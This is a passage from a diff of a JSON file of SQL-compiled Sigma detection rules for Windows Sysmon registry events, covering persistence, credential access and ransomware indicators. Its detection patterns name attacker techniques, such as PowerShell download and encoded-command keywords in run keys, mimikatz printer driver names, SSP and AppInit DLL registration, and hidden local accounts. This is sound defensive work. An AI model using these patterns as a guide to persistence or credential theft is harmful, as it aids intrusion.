Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "description": "Detect changes to the 
\"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_timeproviders_dllname.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + 
"attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Software using weird folders for updates" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_susp_run_key_img_folder.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects static QMS 810 and mimikatz driver name used by 
Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": 
"registry_set_susp_printer_driver.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "status": "test", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1546.009" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR 
Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1112" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND 
TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "New DLL Added to AppInit_DLLs Registry Key", + "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "status": "test", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1546.010" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "title": "Atbroker Registry Change", + "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "author": "Mateusz Wydra, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.persistence", - "attack.t1547.010" + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND 
(User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects the addition of the 
\"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", - "author": "frack113", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574" + "attack.t1136.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": 